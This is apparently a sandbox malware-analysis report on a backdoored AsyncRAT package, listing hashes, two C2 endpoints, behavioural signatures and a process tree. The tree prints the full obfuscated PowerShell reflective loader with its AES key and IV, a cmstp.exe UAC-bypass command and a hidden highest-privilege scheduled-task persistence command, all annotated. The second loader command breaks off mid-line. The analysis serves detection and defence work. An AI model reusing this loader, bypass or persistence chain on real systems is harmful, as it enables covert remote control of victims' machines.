Overview

Per-task scores as shown on the report page (target names are truncated as displayed; the full sample paths are listed under Behavioral tasks):

Score  Target                   Platform
10     Static                   -
10     AsyncRAT/AsyncRAT.lnk    windows10-2004-x64
10     AsyncRAT/AsyncRAT.lnk    windows10-ltsc 2021-x64
10     AsyncRAT/P...at.dll      windows10-2004-x64
1      AsyncRAT/P...at.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...ra.dll      windows10-2004-x64
1      AsyncRAT/P...ra.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...er.dll      windows10-2004-x64
1      AsyncRAT/P...er.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...er.dll      windows10-2004-x64
1      AsyncRAT/P...er.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...er.dll      windows10-2004-x64
1      AsyncRAT/P...er.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...us.dll      windows10-2004-x64
1      AsyncRAT/P...us.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...ns.dll      windows10-2004-x64
1      AsyncRAT/P...ns.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...er.dll      windows10-2004-x64
1      AsyncRAT/P...er.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...ry.dll      windows10-2004-x64
1      AsyncRAT/P...ry.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...ra.dll      windows10-2004-x64
1      AsyncRAT/P...ra.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...op.dll      windows10-2004-x64
1      AsyncRAT/P...op.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...le.dll      windows10-2004-x64
1      AsyncRAT/P...le.dll      windows10-ltsc 2021-x64
1      AsyncRAT/P...ry.dll      windows10-2004-x64
1      AsyncRAT/P...ry.dll      windows10-ltsc 2021-x64
1      AsyncRAT/S...ub.exe      windows10-2004-x64
10     AsyncRAT/S...ub.exe      windows10-ltsc 2021-x64
10     AsyncRAT/u...ig.exe      windows10-2004-x64
10     AsyncRAT/u...ig.exe      windows10-ltsc 2021-x64
Analysis

max time kernel:   150s
max time network:  142s
platform:          windows10-ltsc 2021_x64
resource:          win10ltsc2021-20241211-en
resource tags:     arch:x64, arch:x86, image:win10ltsc2021-20241211-en, locale:en-us, os:windows10-ltsc 2021-x64, system
submitted:         22-12-2024 21:46
Behavioral tasks

Task          Sample                                 Resource
behavioral1   AsyncRAT/AsyncRAT.lnk                  win10v2004-20241007-en
behavioral2   AsyncRAT/AsyncRAT.lnk                  win10ltsc2021-20241023-en
behavioral3   AsyncRAT/Plugins/Chat.dll              win10v2004-20241007-en
behavioral4   AsyncRAT/Plugins/Chat.dll              win10ltsc2021-20241211-en
behavioral5   AsyncRAT/Plugins/Extra.dll             win10v2004-20241007-en
behavioral6   AsyncRAT/Plugins/Extra.dll             win10ltsc2021-20241211-en
behavioral7   AsyncRAT/Plugins/FileManager.dll       win10v2004-20241007-en
behavioral8   AsyncRAT/Plugins/FileManager.dll       win10ltsc2021-20241211-en
behavioral9   AsyncRAT/Plugins/FileSearcher.dll      win10v2004-20241007-en
behavioral10  AsyncRAT/Plugins/FileSearcher.dll      win10ltsc2021-20241211-en
behavioral11  AsyncRAT/Plugins/LimeLogger.dll        win10v2004-20241007-en
behavioral12  AsyncRAT/Plugins/LimeLogger.dll        win10ltsc2021-20241211-en
behavioral13  AsyncRAT/Plugins/Miscellaneous.dll     win10v2004-20241007-en
behavioral14  AsyncRAT/Plugins/Miscellaneous.dll     win10ltsc2021-20241211-en
behavioral15  AsyncRAT/Plugins/Options.dll           win10v2004-20241007-en
behavioral16  AsyncRAT/Plugins/Options.dll           win10ltsc2021-20241023-en
behavioral17  AsyncRAT/Plugins/ProcessManager.dll    win10v2004-20241007-en
behavioral18  AsyncRAT/Plugins/ProcessManager.dll    win10ltsc2021-20241211-en
behavioral19  AsyncRAT/Plugins/Recovery.dll          win10v2004-20241007-en
behavioral20  AsyncRAT/Plugins/Recovery.dll          win10ltsc2021-20241211-en
behavioral21  AsyncRAT/Plugins/RemoteCamera.dll      win10v2004-20241007-en
behavioral22  AsyncRAT/Plugins/RemoteCamera.dll      win10ltsc2021-20241211-en
behavioral23  AsyncRAT/Plugins/RemoteDesktop.dll     win10v2004-20241007-en
behavioral24  AsyncRAT/Plugins/RemoteDesktop.dll     win10ltsc2021-20241211-en
behavioral25  AsyncRAT/Plugins/SendFile.dll          win10v2004-20241007-en
behavioral26  AsyncRAT/Plugins/SendFile.dll          win10ltsc2021-20241211-en
behavioral27  AsyncRAT/Plugins/SendMemory.dll        win10v2004-20241007-en
behavioral28  AsyncRAT/Plugins/SendMemory.dll        win10ltsc2021-20241211-en
behavioral29  AsyncRAT/Stub/Stub.exe                 win10v2004-20241007-en
behavioral30  AsyncRAT/Stub/Stub.exe                 win10ltsc2021-20241211-en
behavioral31  AsyncRAT/upload.config.exe             win10v2004-20241007-en
behavioral32  AsyncRAT/upload.config.exe             win10ltsc2021-20241211-en   (the task reported below; see Analysis and the yara resource path under Signatures)
General

Target:   AsyncRAT/upload.config.exe
Size:     9.8MB
MD5:      7a1eaa75ff1d1e83f564d0e5312a0930
SHA1:     91988fcd3ffe2945d614f2141e0124f9ebcd6e01
SHA256:   de47ee6f5098830b2569a1f0f889e021a9be2604093e3e157852060d307aa9f2
SHA512:   b1d06ffc724e7a393387fb84900af0badf3a84bfe3ea0b2bed27d41f3114586e7b25b9661c2f23476b51b6cf9d5dcb36cf1d807c5441909b2a8315e4d40cc8c7
SSDEEP:   49152:Plnb9f3/00iPuJXm6Os/CTu9VnAaZ+6AmX9mQXd0ujFFoyS+km9nmgMfq9+s6ewR:NnF00iPu   (second block truncated as shown on the page)

Malware Config

Extracted
  Family:    asyncrat
  Version:   0.5.8
  Botnet:    Default
  C2:        jt8iyre.localto.net:2101
             jt8iyre.localto.net:55644
  Mutex:     AbAUwI3PK3e3
  Attributes
    delay:           3
    install:         false
    install_file:    winserve.exe
    install_folder:  %AppData%

Two things worth reading out of this config: install is false, so the client itself does not copy or register anything, and the persistence seen in this run (a logon scheduled task, see Processes) comes from the loader around it, not from the RAT; and localto.net is a tunnelling service, so the C2 hostname resolves to a relay in front of the operator's machine rather than to infrastructure they own.
Signatures

Asyncrat family

Async RAT payload (1 IoC)
  resource:   behavioral32/memory/2964-198-0x00000000078D0000-0x00000000078E2000-memory.dmp
  yara rule:  family_asyncrat
  (a memory dump of powershell.exe PID 2964, the last process in the tree below: the client is loaded reflectively into PowerShell and is never written to disk as a PE)

Blocklisted process makes network request (1 IoC)
  flow 38, pid 2964, powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 5 IoCs)
  Run Powershell and hide display window.
  pids 3468, 2756, 4028, 928, 2964 (all powershell.exe)

Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\Control Panel\International\Geo\Nation
    by cmd.exe, WScript.exe, WScript.exe

Executes dropped EXE (1 IoC)
  pid 4440, AsyncRAT.exe

Drops file in System32 directory (1 IoC)
  File opened for modification: C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk, by powershell.exe
  (the literal, unexpanded %AppData% shows a relative path resolved against a System32 working directory; this is most likely a sandbox artifact of how that powershell.exe was started, not a deliberate write into the Windows directory)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
    by WScript.exe, cmd.exe, powershell.exe, powershell.exe, powershell.exe

Kills process with taskkill (1 IoC)
  pid 4780, taskkill.exe

Modifies registry class (2 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings, by cmd.exe and by powershell.exe

Suspicious behavior: EnumeratesProcesses (44 IoCs)
  3468 powershell.exe (2), 4440 AsyncRAT.exe (33), 2756 powershell.exe (3), 4028 powershell.exe (2), 928 powershell.exe (2), 2964 powershell.exe (2)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  3468 powershell.exe:  SeDebugPrivilege
  2756 powershell.exe:  SeDebugPrivilege, then SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and privilege LUIDs 33, 34, 35, 36 (SeIncreaseWorkingSet, SeTimeZone, SeCreateSymbolicLink, SeDelegateSessionUserImpersonate)
  4780 taskkill.exe:    SeDebugPrivilege
  4028 powershell.exe:  SeDebugPrivilege
  928 powershell.exe:   SeDebugPrivilege, then the same full set as 2756 (through LUID 36), then SeIncreaseQuotaPrivilege through SeManageVolumePrivilege a second time
  (privileges such as SeDebug, SeBackup and SeLoadDriver exist only in a full administrator token, so 2756 (Add-MpPreference) and 928 (Register-ScheduledTask -RunLevel Highest) both ran elevated)

Suspicious use of FindShellTrayWindow (1 IoC)
  pid 4440, AsyncRAT.exe

Suspicious use of SendNotifyMessage (1 IoC)
  pid 4440, AsyncRAT.exe

Suspicious use of WriteProcessMemory (33 IoCs)
  parent -> child (sandbox procid_target), number of writes:
  3060 upload.config.exe -> 556 cmd.exe (82)          x2
  3060 upload.config.exe -> 4376 cmd.exe (83)         x2
  556 cmd.exe            -> 4440 AsyncRAT.exe (86)    x2
  4376 cmd.exe           -> 1864 WScript.exe (87)     x2
  1864 WScript.exe       -> 3468 powershell.exe (88)  x2
  3468 powershell.exe    -> 2484 csc.exe (93)         x2
  2484 csc.exe           -> 2440 cvtres.exe (94)      x2
  3468 powershell.exe    -> 4248 cmstp.exe (95)       x2
  1864 WScript.exe       -> 4396 cmd.exe (111)        x2
  4396 cmd.exe           -> 4028 powershell.exe (113) x3
  4028 powershell.exe    -> 928 powershell.exe (114)  x3
  4028 powershell.exe    -> 2408 WScript.exe (117)    x3
  2408 WScript.exe       -> 460 cmd.exe (118)         x3
  460 cmd.exe            -> 2964 powershell.exe (120) x3
Processes

Process tree as recorded (the number before ⤵ is the depth; each entry gives image path, command line, PID and signatures). Note what the two branches under upload.config.exe are: the first starts the package's own AsyncRAT.exe panel, the second starts the VBS loader whose last stage runs an AsyncRAT client talking to jt8iyre.localto.net. That is consistent with a backdoored copy of the AsyncRAT toolkit: whoever runs this package becomes a victim of it.

1⤵ C:\Users\Admin\AppData\Local\Temp\AsyncRAT\upload.config.exe
   cmdline: "C:\Users\Admin\AppData\Local\Temp\AsyncRAT\upload.config.exe"
   PID 3060; Suspicious use of WriteProcessMemory

   2⤵ C:\Windows\SYSTEM32\cmd.exe
      cmdline: cmd /k start AsyncRAT.exe
      PID 556; Suspicious use of WriteProcessMemory

      3⤵ C:\Users\Admin\AppData\Local\Temp\AsyncRAT\AsyncRAT.exe
         cmdline: AsyncRAT.exe
         PID 4440; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
         (the package's own AsyncRAT.exe, a tray/GUI application; the infection chain is the sibling branch below)

   2⤵ C:\Windows\SYSTEM32\cmd.exe
      cmdline: cmd /k start 7254_output.vbs
      PID 4376; Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory

      3⤵ C:\Windows\System32\WScript.exe
         cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AsyncRAT\7254_output.vbs"
         PID 1864; Checks computer location settings; Suspicious use of WriteProcessMemory

         4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')))
            PID 3468; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            (the Base64 script body is not reproduced on this page; its children show what it did: compile a helper with Add-Type, then run cmstp.exe)

            5⤵ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
               cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wgf5xduh\wgf5xduh.cmdline"
               PID 2484; Suspicious use of WriteProcessMemory
               (csc.exe driven by a .cmdline response file under %TEMP%, followed by cvtres.exe, is how PowerShell's Add-Type compiles inline C#)

               6⤵ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES754F.tmp" "c:\Users\Admin\AppData\Local\Temp\wgf5xduh\CSC76C96DC2F2114FFD81D74B72774D8619.TMP"
                  PID 2440

            5⤵ C:\windows\system32\cmstp.exe
               cmdline: "C:\windows\system32\cmstp.exe" /au C:\windows\temp\4qi0xd2b.inf
               PID 4248
               (cmstp.exe /au with an attacker-written .inf is the CMSTP proxy-execution and UAC-bypass pattern, ATT&CK T1218.003; the two root-level processes at the end of this tree, powershell.exe 2756 and taskkill.exe 4780, have no recorded parent, which is consistent with having been launched through this step)

         4⤵ C:\Windows\system32\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
            PID 4396; Suspicious use of WriteProcessMemory

            5⤵ powershell.exe, PID 4028, 32-bit (SysWOW64) host, started by c.bat. Signatures are listed after the command line. Image path and the full obfuscated command line, exactly as recorded:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ftBNGOmShOOXC7u6Pue69A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$ZjNXA=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$hkZyt=New-Object 
System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YeAxa=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($ZjNXA, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $YeAxa.CopyTo($hkZyt); $YeAxa.Dispose(); $ZjNXA.Dispose(); $hkZyt.Dispose(); $hkZyt.ToArray();}function execute_function($param_var,$param2_var){ IEX '$hMSFrZstRXKXXSE=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA=$hMSFrZstRXKXXSE.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$zQ = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $zQ;$UwrDhZatxq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zQ).Split([Environment]::NewLine);foreach ($EN in 
$UwrDhZatxq) { if ($EN.StartsWith(':: ')) { $Z=$EN.Substring(3); break; }}$payloads_var=[string[]]$Z.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));5⤵
            PID 4028; Command and Scripting Interpreter: PowerShell; System Location Discovery: System Language Discovery; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            How to read the loader above: junk tokens ('OBFOBFUSCUDA', 'Espaco') are stripped with .Replace() just before each IEX, and member names are reversed string literals ('gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'txeTllAdaeR'[-1..-11] -join '' is ReadAllText), so neither name appears intact in the command line. It reads c.bat itself, takes the first line that starts with ':: ' (a batch comment, so cmd.exe ignores it), splits that line on '\', and for each part does Base64 decode -> AES-256-CBC decrypt (key ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis=, IV ftBNGOmShOOXC7u6Pue69A==, PKCS7 padding) -> GZip inflate -> [Reflection.Assembly]::Load -> EntryPoint.Invoke. Payload 0 is invoked with no arguments, payload 1 with a one-element string[].

               6⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr615_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_615.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  PID 928; Command and Scripting Interpreter: PowerShell; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                  (persistence: a hidden logon task with the highest run level that re-runs the VBS dropped in %AppData%; the System32 path in the command line resolving to a SysWOW64 image is WoW64 file-system redirection, because the 32-bit parent launched it)

               6⤵ C:\Windows\SysWOW64\WScript.exe
                  cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_615.vbs"
                  PID 2408; Checks computer location settings; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

                  7⤵ C:\Windows\SysWOW64\cmd.exe
                     cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_615.bat" "
                     PID 460; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

                     8⤵ powershell.exe, PID 2964: the same loader as PID 4028 with the same key and IV, now reading inicia_str_615.bat. Signatures are listed after the command line. Image path and command line exactly as recorded:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ftBNGOmShOOXC7u6Pue69A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$ZjNXA=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$hkZyt=New-Object 
System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YeAxa=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($ZjNXA, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $YeAxa.CopyTo($hkZyt); $YeAxa.Dispose(); $ZjNXA.Dispose(); $hkZyt.Dispose(); $hkZyt.ToArray();}function execute_function($param_var,$param2_var){ IEX '$hMSFrZstRXKXXSE=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA=$hMSFrZstRXKXXSE.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$zQ = 'C:\Users\Admin\AppData\Roaming\inicia_str_615.bat';$host.UI.RawUI.WindowTitle = 